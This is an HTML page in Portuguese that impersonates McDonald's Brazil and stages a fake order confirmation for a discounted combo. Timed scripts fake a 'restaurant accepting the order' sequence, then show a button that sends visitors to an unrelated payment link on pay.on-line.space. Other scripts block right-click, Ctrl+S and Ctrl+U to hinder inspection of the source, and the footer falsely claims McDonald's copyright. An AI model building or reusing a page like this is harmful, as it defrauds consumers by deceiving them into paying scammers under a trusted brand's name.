<!DOCTYPE html>
<html lang="pt-BR">
  <head>
    <!-- Google Tag Manager -->
    <script>
      (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({ "gtm.start": new Date().getTime(), event: "gtm.js" });
        var f = d.getElementsByTagName(s)[0],
          j = d.createElement(s),
          dl = l != "dataLayer" ? "&l=" + l : "";
        j.async = true;
        j.src = "https://www.googletagmanager.com/gtm.js?id=" + i + dl;
        f.parentNode.insertBefore(j, f);
      })(window, document, "script", "dataLayer", "GTM-PZGDSCMH");
    </script>
    <!-- End Google Tag Manager -->

    <meta charset="UTF-8" />
    <link href="css/bootstrap.min.css" rel="stylesheet" />
    <meta name="viewport" content="width=device-width,initial-scale=1" />
    <style>
      .header {
        background: #fff;
        color: white;
        padding: 15px 0;
        text-align: center;
        font-size: 0rem;
        font-weight: bold;
        grid-area: top-bar;
      }
      .main-content {
        max-width: 450px;
        background-color: white;
        text-align: center;
        padding: 2rem 2rem 1rem 2rem;
        border-radius: 10px;
        box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
        margin: 0 auto;
      }
      .main-content h2 {
        margin-bottom: 20px;
      }
      .btn-custom {
        color: white;
        border: none;
        width: 100%;
        margin-bottom: 10px;
        background: #fcbb20;
        font-weight: 600;
        border-radius: 1rem;
        padding: 0.75rem 3rem;
        letter-spacing: 0.3px;
        line-height: 1.15;
      }
      .btn-custom:hover {
        color: white !important;
        background-color: #fcbb20;
        transform: scale(1.02) !important;
      }

      .btn-custom {
        border-radius: 8px !important; /* Arredondamento sutil */
        overflow: hidden; /* Evita que outros estilos sobrescrevam */
      }

      .footer {
        background: #ffffff;
        border-top: 1px solid #e6e6e6;
        text-align: center;
        padding: 15px;
        font-size: 10px;
        color: #666;
      }

      .spinner-container {
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        height: 100px;
      }

      .details-block {
        text-align: left;
        border: 1px solid #ddd;
        padding: 15px;
        border-radius: 8px;
        margin-top: 20px;
      }

      .details-block h4 {
        margin-bottom: 15px;
        font-size: 1.2rem;
        font-weight: bold;
      }

      .details-block div {
        margin-bottom: 15px;
        border-bottom: 1px solid #ddd;
        padding-bottom: 10px;
      }

      .details-block div:last-child {
        border-bottom: none;
        margin-bottom: 0;
      }

      .card-highlight {
        background-color: #ffffff00;
        border: 1px solid #ffffff00;
        border-radius: 8px;
        padding: 15px;
        margin-top: 20px;
        text-align: left;
      }

      .card-highlight h4 {
        font-size: 1.2rem;
        font-weight: bold;
        margin-bottom: 10px;
        color: #155724;
      }

      .card-highlight p {
        font-size: 0.95rem;
        color: #155724;
      }

      .success-block {
        border: 1px solid #ddd;
        border-radius: 8px;
        padding: 15px;
        margin-top: 0px;
        text-align: left;
      }

      .success-block h4 {
        font-size: 1.2rem;
        font-weight: bold;
        margin-bottom: 10px;
        color: green;
        display: flex;
        align-items: center;
        gap: 10px;
      }
    </style>
    <script>
      if (document.addEventListener) {
        document.addEventListener("keydown", bloquearSource);
      } else {
        //Versões antigas do IE
        document.attachEvent("onkeydown", bloquearSource);
      }

      function bloquearSource(e) {
        e = e || window.event;

        var code = e.which || e.keyCode;

        if (
          e.ctrlKey &&
          (code == 83 || code == 85) //83 = S, 85 = U
        ) {
          if (e.preventDefault) {
            e.preventDefault();
          } else {
            e.returnValue = false;
          }

          return false;
        }
      }
    </script>
    <style>
      /*desabilita a seleção no body*/
      body {
        -webkit-touch-callout: none; /* iOS Safari */
        -webkit-user-select: none; /* Chrome/Safari/Opera */
        -khtml-user-select: none; /* Konqueror */
        -moz-user-select: none; /* Firefox */
        -ms-user-select: none; /* Internet Explorer/Edge */
        user-select: none;
      }

      /*habilita a seleção nos campos editaveis*/
      input,
      textarea {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: text; /* Chrome/Safari/Opera */
        -khtml-user-select: text; /* Konqueror */
        -moz-user-select: text; /* Firefox */
        -ms-user-select: text; /* Internet Explorer/Edge */
        user-select: text;
      }

      /*habilita a seleção nos campos com o atributo contenteditable*/
      [contenteditable="true"] {
        -webkit-touch-callout: initial; /* iOS Safari */
        -webkit-user-select: all; /* Chrome/Safari/Opera */
        -khtml-user-select: all; /* Konqueror */
        -moz-user-select: all; /* Firefox */
        -ms-user-select: all; /* Internet Explorer/Edge */
        user-select: all;
      }
    </style>

    <script>
      if (document.addEventListener) {
        document.addEventListener("contextmenu", function (e) {
          e.preventDefault();
          return false;
        });
      } else {
        //Versões antigas do IE
        document.attachEvent("oncontextmenu", function (e) {
          e = e || window.event;
          e.returnValue = false;
          return false;
        });
      }
    </script>
  </head>

  <body>
    <!-- Google Tag Manager -->
    <script>
      (function (w, d, s, l, i) {
        w[l] = w[l] || [];
        w[l].push({ "gtm.start": new Date().getTime(), event: "gtm.js" });
        var f = d.getElementsByTagName(s)[0],
          j = d.createElement(s),
          dl = l != "dataLayer" ? "&l=" + l : "";
        j.async = true;
        j.src = "https://www.googletagmanager.com/gtm.js?id=" + i + dl;
        f.parentNode.insertBefore(j, f);
      })(window, document, "script", "dataLayer", "GTM-PZGDSCMH");
    </script>
    <!-- End Google Tag Manager -->

    <div
      style="
        display: grid;
        grid-template-areas:
          'top-bar'
          'content'
          'footer';
        grid-template-rows: auto 1fr auto;
        min-height: 100vh;
      "
    >
      <div class="header">
        <img
          decoding="async"
          style="width: 60px"
          src="../../imagens/logo-mc-m.png"
          alt="Imagem Centralizada"
        />
      </div>

      <div style="grid-area: content; padding: 0 1rem">
        <div class="main-content">
          <!-- Primeira etapa de geração da taxa -->
          <div id="etapa1" class="spinner-container">
            <p>Pedido sendo recebido pelo restaurante mais proximo...</p>
            <div class="spinner-border" role="status">
              <span class="visually-hidden">Carregando...</span>
            </div>
          </div>

          <!-- Segunda etapa - Taxa de envio gerada -->
          <div id="etapa2" class="success-block d-none">
            <h4>
              <svg
                xmlns="http://www.w3.org/2000/svg"
                width="24"
                height="24"
                fill="green"
                class="bi bi-check-circle-fill"
                viewBox="0 0 16 16"
              >
                <path
                  d="M16 8A8 8 0 1 1 0 8a8 8 0 0 1 16 0zM6.354 10.354l4-4a.5.5 0 1 0-.708-.708L6 9.293 4.354 7.646a.5.5 0 1 0-.708.708l2 2a.5.5 0 0 0 .708 0z"
                ></path>
              </svg>
              Seu pedido foi aceito!
            </h4>
          </div>

          <div class="details-block d-none" id="etapa-detalhes">
            <h4>Detalhes do Pedido</h4>
            <div>
              <strong>McOferta Selecionada:</strong>
              <p>2 Lanches + 1 Bebida 500ml <br />Combo (McOferta)</p>
            </div>
            <div>
              <strong>Método de Entrega:</strong>
              <p>
                <strong>Entrega Parceira | Motoboy Grátis</strong><br />
                Tempo Médio: 17 - 29 min<br />
                Cupom Aplicado!✅
              </p>
            </div>
            <div>
              <strong>Total = R$:26,80</strong>
              <p>
                O tempo de entrega inicia-se após a realização do pagamento.
              </p>
            </div>
          </div>

          <!-- Cartão Virtual Disponível Hoje -->
          <span id="etapa3" hidden></span>

          <!-- Botão Final -->
          <button
            type="button"
            id="confirmar"
            onclick="location.href='https://pay.on-line.space/DPXw3Xkr5P9gzmp'"
            class="btn btn-custom w-100 rounded-pill mt-4 d-none"
          >
            INFORMAR ENDEREÇO
          </button>
        </div>
      </div>

      <!-- Footer -->
      <div class="footer">
        Copyright © 2025 Mc Donald's. Todos os direitos reservados.<br />

        Política de Privacidade | Termos de Uso Vendas e Reembolsos | Legal Mapa
        do Site
      </div>

      <script>
        function mostrarEtapas() {
          // Simula a geração da taxa
          setTimeout(() => {
            document.getElementById("etapa1").classList.add("d-none");
            document.getElementById("etapa2").classList.remove("d-none");
          }, 3000);

          // Simula a exibição dos detalhes e do botão
          setTimeout(() => {
            document
              .getElementById("etapa-detalhes")
              .classList.remove("d-none");
            document.getElementById("etapa3").classList.remove("d-none");
            document.getElementById("confirmar").classList.remove("d-none");

            // Obtém o endereço armazenado no localStorage
            const endereco = JSON.parse(
              localStorage.getItem("enderecoCliente")
            );
            if (endereco) {
              document.getElementById("enderecoCliente").innerHTML = `
                        ${endereco.rua}, ${endereco.numero}<br>
                        ${endereco.bairro}<br>
                        ${endereco.cidade}-${endereco.estado}<br>
                        CEP: ${endereco.cep}
                    `;
            } else {
              document.getElementById("enderecoCliente").innerText =
                "Endereço não encontrado.";
            }
          }, 6000);
        }

        // Executa a função ao carregar a página
        window.onload = mostrarEtapas;
      </script>
    </div>
  </body>
</html>
